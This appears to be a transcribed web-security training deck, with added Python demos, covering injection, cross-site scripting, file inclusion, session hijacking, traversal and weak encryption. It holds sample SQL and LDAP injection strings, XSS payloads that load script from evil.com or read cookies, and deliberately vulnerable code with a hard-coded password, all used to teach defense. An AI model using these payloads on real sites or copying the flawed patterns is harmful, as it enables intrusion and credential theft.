Application and Website
Security – Fundamental
Edition
Daniel Owens
IT Security Professional
Agenda

 Course Introduction
 Common Input Validation Flaws
 Common Access Control Flaws
 Common Encryption Flaws
 Tools
 Conclusion And Appendices
Purpose

 Drum up interest


Session Prerequisites

 None
Communication Media and Security
Concerns
 Communication media:
   „Wired‟ networks
   „Wireless‟ networks
 Security concerns:
   The Insider
   The Outsider
   The Technology
   Nature
A Note About Security

   Security helps functionality – if it doesn’t help
    functionality, it isn’t security.
                                           -Daniel Owens
Consequences of Poor Security

 Stolen intellectual property
 System downtime
 Lost productivity
 Damage to NASA's reputation
 Lost public confidence
 Lost revenue
 Congressional inquiries
SQL | LDAP Injection

 SQL and LDAP Injection
   The injection of attacker-controlled text into a query so that it changes the
   query's structure, bypassing filtering and executing a query of the
   attacker's choosing
     Prevented primarily by parameterized statements (prepared statements with
     bound variables) and strongly typed variables; escaping and whitelists are
     secondary defenses, not substitutes
   Example strings include (the second and third are the URL-encoded and
   HTML-entity-encoded forms of 1' OR '1'='1; a filter that looks only for the
   literal quote character never sees them):
     1'1
     %31%27%20%4F%52%20%27%31%27%3D%27%31
     &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
     *(|(mail=*))   (an LDAP search-filter injection)
Java SQL Injection

   import java.sql.Connection;
   import java.sql.DriverManager;
   import java.sql.ResultSet;
   import java.sql.Statement;

   public class Login {
     public static void main(String[] args) throws Exception {
       String username = args[0];
       String password = args[1];
       // Untrusted input is concatenated straight into the SQL text: this is the injection point.
       String query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'";
       // Hard-coded database credentials are a second flaw in the same snippet.
       Connection conn = DriverManager.getConnection("jdbc:odbc:logistics", "admin", "LetMeIn");
       Statement stmnt = conn.createStatement();
       ResultSet rs = stmnt.executeQuery(query);
       // …
     }
   }
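The following Python script is an added example, not code from the deck: it reproduces the Java snippet's string-built LIKE query against an in-memory SQLite table (constructed sample rows), shows the same payload from the injection slide arriving in two different encodings, and contrasts the vulnerable query with a parameterized one. The table contents, the payloads and the LIKE-wildcard escaping are the example's own assumptions.

```python
import html
import sqlite3
import urllib.parse

# Constructed sample table (not from the slides): the users table the Java snippet queries.
SAMPLE_USERS = [("admin", "s3cr3t"), ("alice", "wonder"), ("bob", "builder")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    # Same shape as the slide's Java: the request value is pasted into the SQL text,
    # so quotes, comments and LIKE wildcards in it become part of the query.
    query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'"
    return conn.execute(query).fetchall()


def escape_like(value, esc="\\"):
    # A bound parameter cannot break out of the string literal, but % and _ are
    # still wildcards inside LIKE, so they have to be escaped separately.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def lookup_safe(conn, username):
    # Parameterized statement: the value travels separately from the SQL text.
    query = "SELECT uid, pass FROM users WHERE uid LIKE ? ESCAPE '\\'"
    return conn.execute(query, (escape_like(username) + "%",)).fetchall()


def decode_payloads():
    # The slide's second and third strings are one payload in two encodings.
    url_form = "%31%27%20%4F%52%20%27%31%27%3D%27%31"
    entity_form = "&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49"
    return urllib.parse.unquote(url_form), html.unescape(entity_form)


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "%' OR '%'='"))   # every row: the quote closes the literal
    print(lookup_vulnerable(db, "%"))             # every row: no quote needed, just a wildcard
    print(lookup_safe(db, "%' OR '%'='"))         # []
    print(decode_payloads())
```

Two things the slide's bullet list does not show: a plain `%` dumps the table without breaking out of the quotes at all, and a parameterized query alone still passes that wildcard through, which is why `escape_like` is needed on top of the bound parameter.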
Demonstration 1
    SQL Injection
Bypassing Security Checks
Case Study 1
SQL Injection
Owning Networks
Cross-Site Scripting (XSS)

 XSS
   The injection of client-side code (usually JavaScript) into a page that other
   users' browsers will render
   Comes in three kinds:
     Persistent (stored by the server and served to every visitor)
     Non-Persistent (reflected straight back from the current request)
     DOM-based (the page's own script writes untrusted data into the DOM)
   Only occurs when user input influences the output
     Can be stopped by assuming all input is malicious until proven otherwise
     through a whitelist, and by encoding output for the context (HTML body,
     attribute, JavaScript, URL) into which it is written
   Can lead to a complete system compromise – for
Cross-Site Scripting (cont.)

 XSS (cont.)
   Sample strings:
     <script src=http://evil.com/attack.js << </script <<
     <link rel="stylesheet" href=http://evil.com/attack.css>
     %3Cscript%3Epref%3Dfunction(a%2Cb){document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B}%3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E
       (URL-decoded: <script>pref=function(a,b){document.write(a+" -> "+b+"<br />");};</script><script src="view-source:resource:///greprefs/all.js"></script>)
     <img src="" onMouseOver="alert(document.cookie)"; />
ASP.NET Cross-Site Scripting

   <%@ Page Language="C#" ValidateRequest="false" %>
   <html>
    <script runat="server">
     // Request validation is switched off in the page directive above, and the
     // text box value is written to the response without encoding: whatever the
     // user typed becomes page markup.
     void btnSubmit_Click(Object sender, EventArgs e)
     {
       Response.Write(txtString.Text);
     }
    </script>
    <body>
     <form id="form1" runat="server">
      <asp:TextBox id="txtString" runat="server"
              Text="<script>alert('hi');</script>" />
      <asp:Button id="btnSubmit" runat="server"
             OnClick="btnSubmit_Click"
             Text="Submit" />
     </form>
    </body>
   </html>
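An added Python example (not from the deck) that plays the role of the ASP.NET page above: one function writes the text box value straight into the page as Response.Write does, the others encode it for the HTML body and attribute contexts, and a small HTML parser shows which output a browser would still read as a tag carrying an event handler. The payload is the img/onMouseOver string from the sample list; the page layout, field names and the username whitelist pattern are assumptions made for the example.

```python
import html
import re
from html.parser import HTMLParser

# Constructed payload, copied from the slide's sample strings.
ONMOUSEOVER_PAYLOAD = '<img src="" onMouseOver="alert(document.cookie)"; />'


def render_vulnerable(user_text):
    # Equivalent of Response.Write(txtString.Text): the input becomes page markup.
    return "<p>Hello, " + user_text + "</p>"


def render_body_safe(user_text):
    # HTML body context: encode < > & " ' so the browser treats the text as text.
    return "<p>Hello, " + html.escape(user_text, quote=True) + "</p>"


def render_attribute_safe(user_text):
    # Attribute context: the attribute is quoted AND the value is encoded.
    return '<input type="text" name="q" value="' + html.escape(user_text, quote=True) + '">'


def render_attribute_unquoted(user_text):
    # Encoding alone is not enough: an unquoted attribute ends at the first space,
    # so a payload with no special characters at all still adds an event handler.
    return '<input type="text" name="q" value=' + html.escape(user_text, quote=True) + ">"


# Whitelist validation, as the slide recommends: only what a user name may contain.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_username(value):
    return USERNAME_RE.fullmatch(value) is not None


class _TagCollector(HTMLParser):
    """Parses rendered output the way a browser would, recording each tag and its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def tags_in(rendered):
    collector = _TagCollector()
    collector.feed(rendered)
    return collector.tags


def has_event_handler(rendered):
    # True when the browser would see an on* attribute, i.e. attacker script would run.
    return any(name.startswith("on") for _, attrs in tags_in(rendered) for name in attrs)


if __name__ == "__main__":
    for render in (render_vulnerable, render_body_safe):
        print(render.__name__, tags_in(render(ONMOUSEOVER_PAYLOAD)))
```

The unquoted-attribute case is the one to remember: `html.escape` does exactly its job there and the page is still exploitable, because the fix is chosen per output context, not per function call.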
Demonstration 2
       XSS
    Having Fun
Remote File Include/Execution | Code Injection

 Remote File Include and Execution
   An attacker tricks the system into including and/or executing arbitrary files
 Code Injection
   An attacker tricks the system into executing arbitrary code by injecting the
   commands into the code
 Both
   Code of the attacker's choosing is executed
   Contrary to popular belief, ANY language can suffer this
PHP Remote File Include

   <?php
    // ...
    // Both include paths come straight from the query string: with allow_url_include
    // enabled the attacker can point them at a remote script, and even without it
    // at any local file the web server process can read.
    require_once($_GET['config']);
    require_once($_GET['base'] . "/index.php");
    // ...
   ?>
ASP.NET Remote File Include

   <%
    ' ...
    ' Classic ASP (VBScript) syntax as written on the slide: the page fetches
    ' whatever URL the query string names, server-side, and echoes the response
    ' body into its own output.
    url = Request.QueryString
    set xml = Server.CreateObject("Microsoft.XMLHTTP")
    xml.open "GET", url, false
    xml.send ""
    Response.Write xml.responseText
    set xml = nothing
    ' ...
   %>
Hidden Elements | Cookies

 Hidden Elements and Cookies
   Hidden fields and cookies were merely intended to provide data storage
   without cluttering up the user's view
     They do not provide secure storage
     They are not immutable storage locations
   Neither should contain sensitive information
   Both should be considered malicious until proven otherwise
     Any data in them should not be directly used for output
     Whitelisting should be used to prove innocence
Hidden Elements | Cookies (cont.)

 Hidden Elements and Cookies (cont.)
   Decoded (binary) contents of a hidden form field from an ASP.NET page, as
   shown on the slide (host name partly redacted on the slide); note the HTML
   anchor that has ended up inside a user name value:
     &#65533; -575840793
     ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspx
     TextErrorddOnClickreturnconfirm ... 'USERNAME (RandomData)'); return false;
     ddhSetTargetText('ctl00_SimpleSearchForm_User2_InputFieldTextbox',
     'USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return;
     fd-ctl00$SimpleSearchForm$User1$UserListGridView<+
     &#65533; fd
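Because hidden fields and cookies are editable by the client, any value that has to round-trip through them must be signed so the server can tell it was not altered. The Python below is an added example, not the deck's code: an HMAC over the value, a verifier, the edit an attacker would make with a tool such as Tamper Data, and a reminder that signing hides nothing. The key and the field values are constructed for the example; the stronger option, keeping the state server-side and sending only an opaque reference, is not shown.

```python
import base64
import hashlib
import hmac
import secrets

# Constructed server-side key; in production it is generated once, kept out of the
# web root, and never sent to the client.
SERVER_KEY = secrets.token_bytes(32)


def sign_field(value, key=SERVER_KEY):
    """Turn a value bound for a hidden field or cookie into "body.signature" (both URL-safe base64)."""
    body = base64.urlsafe_b64encode(value.encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).digest()
    return body + "." + base64.urlsafe_b64encode(tag).decode()


def verify_field(token, key=SERVER_KEY):
    """Return the value only if the signature matches; None otherwise. Never use the value before this."""
    try:
        body, sig = token.split(".", 1)
        expected = hmac.new(key, body.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(base64.urlsafe_b64decode(sig), expected):
            return None
        return base64.urlsafe_b64decode(body).decode()
    except (ValueError, UnicodeDecodeError):   # malformed token, bad base64, bad UTF-8
        return None


def tamper(token, new_value):
    """What the attacker does in the proxy: swap the body, keep the old signature."""
    _, sig = token.split(".", 1)
    return base64.urlsafe_b64encode(new_value.encode()).decode() + "." + sig


def readable_without_key(token):
    """Signing is integrity, not secrecy: anyone holding the token can still read the value."""
    return base64.urlsafe_b64decode(token.split(".", 1)[0]).decode()


if __name__ == "__main__":
    token = sign_field("price=19.99;role=user")          # constructed field contents
    print(verify_field(token))                            # price=19.99;role=user
    print(verify_field(tamper(token, "price=0.01;role=admin")))   # None
    print(readable_without_key(token))                    # still plainly readable
```

`hmac.compare_digest` is used instead of `==` so that a wrong signature is rejected in constant time; a plain comparison leaks, byte by byte, how much of a forged tag was correct.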
Session Hijacking – Cookie Theft

 Cookie Theft
   The theft of a client's session cookies by an attacker, who then presents
   them as their own
     Often possible because of other vulnerabilities – browser flaws (sandbox
     escapes), having HTTP TRACE enabled (cross-site tracing), XSS, etc.
   Can be hampered if the session is bound to the client that started it
   (called a NONCE here, though it is a binding check rather than a
   single-use number)
     The binding should be a set of characteristics unique to the specific
     session – client IP, server IP, server port, user agent string, and other
     key information – checked on every request, so a stolen cookie presented
     from elsewhere fails the check; client IP and user agent can be shared
     or spoofed, so this raises the bar rather than closing the hole
     Additional mechanisms include the Secure and HttpOnly cookie flags, but
     these have limited impact: Secure only keeps the cookie off plaintext
     HTTP, and HttpOnly stops script from reading document.cookie but not an
     attacker who can already issue requests from the victim's browser
Session Hijacking – Session Fixation

 Session Fixation
   An attacker uses a 'known' session ID
     Often, the attacker opens the session and keeps it open while attempting
     to convince a victim to log in using the known session
   This is often a phishing or other social engineering attack
   Can be hampered if session IDs are 'rekeyed' (regenerated) on login AND
   sessions expire and are removed quickly; the server should also refuse any
   session ID it did not issue itself, so an attacker cannot simply invent one
   Difficult to stop if session IDs are guessable
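An added Python example (not from the deck) that implements the defenses from the cookie-theft and session-fixation slides in one in-memory session store: unguessable IDs, refusal of IDs the server never issued, binding to a client fingerprint (IP and user agent, the NONCE above), re-keying on login, and idle expiry. `fixation_scenario()` walks an attacker-opened session being handed to a victim, a stolen cookie replayed from another machine, and expiry. The store, the two clients, the timings and the 900-second idle limit are constructed assumptions.

```python
import secrets
import time

SESSION_TTL = 900  # seconds a session may sit idle before it is dropped (assumed value)


class SessionStore:
    """Server-side session table: the cookie carries only an opaque id, all state stays here."""

    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock

    @staticmethod
    def _fingerprint(client):
        # The binding the slide calls a NONCE: attributes that should not change mid-session.
        return (client["ip"], client["user_agent"])

    @staticmethod
    def _new_id():
        return secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG: not guessable

    def start(self, client):
        """Issue a fresh id. Ids come only from here; a client-supplied id is never adopted."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "fp": self._fingerprint(client), "seen": self._clock()}
        return sid

    def _lookup(self, sid, client):
        entry = self._sessions.get(sid)
        if entry is None:
            return None                          # never issued, or already removed
        now = self._clock()
        if now - entry["seen"] > SESSION_TTL:
            del self._sessions[sid]              # idle too long: expire and forget it
            return None
        if entry["fp"] != self._fingerprint(client):
            return None                          # cookie presented from a different client
        entry["seen"] = now
        return entry

    def login(self, sid, client, user):
        """Re-key on login: the pre-authentication id (which an attacker may know) dies here."""
        entry = self._lookup(sid, client)
        if entry is None:
            return None
        del self._sessions[sid]
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "fp": entry["fp"], "seen": self._clock()}
        return new_sid

    def user_for(self, sid, client):
        entry = self._lookup(sid, client)
        return entry["user"] if entry else None


def fixation_scenario():
    """Constructed walk-through of the attacks on the two slides above; returns each outcome."""
    clock = [1_000.0]
    store = SessionStore(clock=lambda: clock[0])
    attacker = {"ip": "203.0.113.9", "user_agent": "curl/7.0"}
    victim = {"ip": "198.51.100.7", "user_agent": "Mozilla/5.0"}
    out = {}

    # 1. An id the attacker simply made up is unknown to the server.
    out["invented_id_works"] = store.user_for("attacker-chosen-id", victim) is not None

    # 2. Attacker opens a real session and lures the victim into logging in with it:
    #    the fingerprint no longer matches, so the login is refused outright.
    fixated = store.start(attacker)
    out["fixated_login_from_other_client"] = store.login(fixated, victim, "alice")

    # 3. Worst case: attacker shares the victim's NAT address and browser string, so the
    #    fingerprint matches. Re-keying is what saves the victim: the old id is dead.
    fixated = store.start(dict(victim))
    new_sid = store.login(fixated, victim, "alice")
    out["rekeyed"] = new_sid is not None and new_sid != fixated
    out["old_id_after_login"] = store.user_for(fixated, victim)
    out["victim_session_user"] = store.user_for(new_sid, victim)

    # 4. The live cookie stolen (e.g. via XSS) and replayed from the attacker's machine.
    out["replay_from_attacker"] = store.user_for(new_sid, attacker)

    # 5. Idle expiry.
    clock[0] += SESSION_TTL + 1
    out["after_expiry"] = store.user_for(new_sid, victim)
    return out


if __name__ == "__main__":
    for name, value in fixation_scenario().items():
        print(name, "->", value)
```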
Demonstration 3
Session Hijacking
  Session Fixation
Directory Traversal

 Directory Traversal
   An attacker is able to trick the system into traversing the directory
   structure
     In many instances, arbitrary files can be viewed
     Attackers are often attempting to execute a file or gather information
   If user input dictates the output, care must be taken to ensure the input
   is 'valid'
     Whitelists become invaluable
   In extreme cases, an attacker can actually use this to gain administrator
   access to the server
PHP Directory Traversal

   <?php
    // ...
    // The file name is taken from the query string and joined onto the directory:
    // a value containing ../ sequences walks straight out of calendar/.
    $date = $_GET['date'];
    if ($handle = fopen("calendar/$date", "rb")) {
      print(fread($handle, filesize("calendar/$date")));
      fclose($handle);
    }
    // ...
   ?>
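The Python below is an added example covering both the include slides and the directory traversal slide; it is not code from the deck. It replaces `require_once($_GET['config'])` with a lookup in a fixed allowlist that also refuses anything carrying a URL scheme, and replaces `fopen("calendar/$date")` with a whitelist pattern plus a canonical-path containment check. The allowlist entries, the file names and the temporary directory built by `demo()` are constructed for the example.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit

# Constructed allowlist: the only "config" values a request may select, and what each maps to.
ALLOWED_INCLUDES = {
    "default": "config/default.php",
    "mobile": "config/mobile.php",
}

# Characters a calendar file name may contain (whitelist, as the slide recommends).
NAME_RE = re.compile(r"[A-Za-z0-9._/-]{1,64}")


def resolve_include(name):
    """Replacement for require_once($_GET['config']): look the name up, never use it as a path."""
    if urlsplit(name).scheme:
        # http://, ftp://, php://, data: ... a remote or stream-wrapper include is never loaded
        raise ValueError("remote include refused: " + name)
    if name not in ALLOWED_INCLUDES:
        raise ValueError("unknown include: " + name)
    return ALLOWED_INCLUDES[name]


def include_refused(name):
    try:
        resolve_include(name)
        return False
    except ValueError:
        return True


def read_calendar_vulnerable(calendar_dir, date):
    # What the slide's PHP does: the request value is joined straight onto the directory.
    with open(os.path.join(calendar_dir, date), "rb") as fh:
        return fh.read()


def read_calendar(calendar_dir, date):
    """Whitelist the value, then prove the resolved path is still inside calendar_dir."""
    if NAME_RE.fullmatch(date) is None:
        raise ValueError("bad file name: " + repr(date))
    base = os.path.realpath(calendar_dir)
    path = os.path.realpath(os.path.join(base, date))   # resolves .., symlinks, absolute paths
    if path == base or os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes calendar directory: " + date)
    with open(path, "rb") as fh:
        return fh.read()


def demo():
    """Build a throwaway calendar/ directory with one secret outside it and try the attacks."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        calendar = os.path.join(root, "calendar")
        os.mkdir(calendar)
        with open(os.path.join(calendar, "2009-01-01"), "wb") as fh:
            fh.write(b"launch review 09:00")       # constructed calendar entry
        with open(os.path.join(root, "secret.txt"), "wb") as fh:
            fh.write(b"db password")                # constructed file outside calendar/
        results["ok"] = read_calendar(calendar, "2009-01-01")
        results["vulnerable_leak"] = read_calendar_vulnerable(calendar, "../secret.txt")
        for bad in ("../secret.txt", "2009-01-01/../../secret.txt", "/etc/passwd", "%2e%2e/secret.txt"):
            try:
                read_calendar(calendar, bad)
                results[bad] = "allowed"
            except ValueError:
                results[bad] = "refused"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The regex and the `realpath` check are deliberately both present: the pattern above still admits `/` and `..`, so the containment check is what stops the first three bad names, while the pattern alone stops the URL-encoded one. Relying on a single layer means one slip in the pattern reopens the hole.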
Session Hijacking – Spoofing

 Spoofing
   Pretending to be someone else, an attacker attempts to gain the victim's
   privileges
   Comes in three basic forms
     Blind (write-only)
     Half pipe (read-only)
     Full pipe
   Network configuration and other protection mechanisms can make this
   difficult to defeat (both for the attacker and for the developer)
Demonstration 4
Session Hijacking
     Spoofing
Case Study 2
Session Hijacking
     Spoofing
Weak Encryption | Using Encoding

 Weak/Home-Grown Encryption
   The use of weak and home-grown encryption has led to the compromise of
   many systems
     It is also what makes session hijacking via spoofing, and man-in-the-middle
     (bucket brigade) attacks with substitution, so trivial
 Encoding
   The use of algorithms that take output and simply change its representation
   (normally the number of bits used per character), e.g. Base64 or URL encoding
     Encoding has no key and is reversible by anyone, so it provides no
     confidentiality; it is not secure by any means
Case Study 3
Weak Encryption | Encoding
           XOR
           SHA
          Base64
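An added Python example for the XOR / SHA / Base64 case study (not the deck's code): Base64 is reversed with no key, a single-byte XOR "cipher" is broken by trying all 256 keys and scoring the output for English text, and an unsalted SHA-1 password hash is recovered from a small wordlist. `hash_password` shows the corrected form, a salted and deliberately slow PBKDF2. The plaintext, key, wordlist and the iteration count are constructed for the example; the XOR scoring heuristic is the example's own.

```python
import base64
import hashlib
import hmac
import os
import string


# --- Base64: encoding, not encryption ----------------------------------------------
def decode_base64(text):
    """Anyone can reverse an encoding; there is no key to be missing."""
    return base64.b64decode(text).decode()


# --- Single-byte XOR: a home-grown "cipher" with 256 possible keys ------------------
def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def _english_score(candidate):
    # Crude plaintext detector: reward spaces and ASCII letters, punish unprintable bytes.
    score = 0
    for b in candidate:
        c = chr(b)
        if c == " ":
            score += 2
        elif c.isascii() and c.isalpha():
            score += 1
        elif c not in string.printable:
            score -= 10
    return score


def break_single_byte_xor(ciphertext):
    """Try every key and keep the output that looks most like text. No secret survives this."""
    best = max(range(256), key=lambda k: _english_score(xor_bytes(ciphertext, k)))
    return best, xor_bytes(ciphertext, best).decode("latin-1")


# Constructed sample: a value "protected" with the single key byte 0x5A.
SAMPLE_KEY = 0x5A
SAMPLE_PLAINTEXT = "the quick brown fox jumps over the lazy dog, again and again"
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PLAINTEXT.encode(), SAMPLE_KEY)


# --- Unsalted SHA-1: a fast hash turns password recovery into a lookup -------------
def sha1_hex(word):
    return hashlib.sha1(word.encode()).hexdigest()


def crack_sha1(hex_digest, wordlist):
    for word in wordlist:
        if sha1_hex(word) == hex_digest:
            return word
    return None


WORDLIST = ["password", "123456", "LetMeIn", "admin"]   # constructed tiny dictionary


# --- Corrected form: salted, slow, purpose-built password hashing ---------------------
def hash_password(password, salt=None, iterations=600_000):
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password, salt, digest, iterations=600_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print(decode_base64("TGV0TWVJbg=="))                    # LetMeIn
    print(break_single_byte_xor(SAMPLE_CIPHERTEXT))          # (90, 'the quick brown fox ...')
    print(crack_sha1(sha1_hex("LetMeIn"), WORDLIST))         # LetMeIn
```

The salt in `hash_password` defeats precomputed tables and the iteration count makes each guess cost the attacker as much as it costs the server; neither property exists for a bare SHA-1 digest, which is why the wordlist attack above is instant.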
Security Compass

 XSS-Me
   A free Firefox plug-in
   Performs semi-automated XSS attacks against
   POST fields
 SQL Inject-Me
   A free Firefox plug-in
   Performs semi-automated SQL injection attacks
   against POST fields
 Access-Me
   A free Firefox plug-in…
Other Firefox Add-ons

 Web Developer Add-on
   Free
   Lets you view source files cleanly and easily
   Lets you quickly enable and disable things (like cookies, JavaScript, and
   Meta Refresh)
   Lets you view and modify form fields and cookie data
 Tamper Data
   Free
   Lets you modify most request data
Fuzzers

 BED.pl
   Free Perl script
   Performs basic tests of your SERVER
 JBroFuzz
   Free Java application
   Lets you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion
 Powerfuzzer
   Free and commercial versions (Python script)
   Easy and multi-talented… automated
Other Tools

 Sothink SWF Decompiler
   Decompiles Adobe Flash (SWF) and Flex content
 Cavaj
   Free
   Decompiles Java class files back to source
 Nikto
   Free
   Scans a website for common, basic vulnerabilities and misconfigurations
For More Information

 Microsoft Security Site (all audiences)
   http://www.microsoft.com/security
 MSDN Security Site (developers)
   http://msdn.microsoft.com/security
 TechNet Security Site (IT professionals)
   http://www.microsoft.com/technet/security
 SANS Top-20 (IT Professionals)
   http://www.sans.org/top20/
For More Information (cont.)

 Common Weakness Enumeration
 (CWE)/SANS Top 25 Most Dangerous
 Programming Errors (developers)
   http://cwe.mitre.org/top25/index.html
 GRC IT Security Office
   http://itsecurity.grc.nasa.gov
 Most Common Software Errors
   http://discussweb.com/software-testing/803-most-
   common-software-errors.html
Acknowledgements

 I stole the background from Microsoft
 I stole a lot from my experiences and
 previous writings

Mais conteúdo relacionado

Mais procurados

Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesWebsecurify
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat Security Conference
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3Folio3 Software
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Susam Pal
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing ITZairul Nizam
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paperZairul Nizam
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]Olivier Dony
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Controlenigma0x3
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat Security Conference
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 

Mais procurados (20)

Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best Practices
 
Php web app security (eng)
Php web app security (eng)Php web app security (eng)
Php web app security (eng)
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Web Application Security - Folio3
Web Application Security - Folio3Web Application Security - Folio3
Web Application Security - Folio3
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Security in Computing IT
Security in Computing ITSecurity in Computing IT
Security in Computing IT
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paper
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Control
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
